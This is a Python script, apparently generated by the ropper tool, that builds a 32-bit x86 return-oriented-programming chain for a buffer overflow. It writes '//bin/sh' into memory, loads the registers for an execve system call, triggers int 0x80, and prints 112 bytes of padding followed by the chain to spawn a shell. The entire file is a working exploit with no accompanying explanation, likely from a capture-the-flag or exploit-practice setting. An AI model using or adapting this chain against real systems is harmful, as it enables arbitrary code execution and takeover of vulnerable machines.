#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # 011bff3544eb16aa736d0382af86cb9261168e5ac1e960c39b725920bc255267
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''
rop += p(0x08056694) # 0x08056694: pop eax; pop edx; pop ebx; ret;
rop += rebase_0(0x000a9060)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0009b8ed) # 0x080e38ed: pop edx; ret; 
rop += '//bi'
rop += rebase_0(0x0003467a) # 0x0807c67a: mov dword ptr [eax], edx; pop ebx; pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0x08056694) # 0x08056694: pop eax; pop edx; pop ebx; ret;
rop += rebase_0(0x000a9064)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0009b8ed) # 0x080e38ed: pop edx; ret; 
rop += 'n/sh'
rop += rebase_0(0x0003467a) # 0x0807c67a: mov dword ptr [eax], edx; pop ebx; pop esi; pop edi; ret; 
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += p(0xdeadbeef)
rop += rebase_0(0x0000e780) # 0x08056780: xor eax, eax; ret; 
rop += rebase_0(0x0009b8ed) # 0x080e38ed: pop edx; ret; 
rop += rebase_0(0x000a9068)
rop += rebase_0(0x0000f1c5) # 0x080571c5: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret; 
rop += rebase_0(0x000a9060)
rop += rebase_0(0x00034681) # 0x0807c681: pop ecx; ret; 
rop += rebase_0(0x000a9068)
rop += rebase_0(0x0009b8ed) # 0x080e38ed: pop edx; ret; 
rop += rebase_0(0x000a9068)
rop += rebase_0(0x0000e780) # 0x08056780: xor eax, eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x0003469a) # 0x0807c69a: inc eax; ret; 
rop += rebase_0(0x00027b40) # 0x0806fb40: int 0x80; ret; 
print "A"*112 + rop
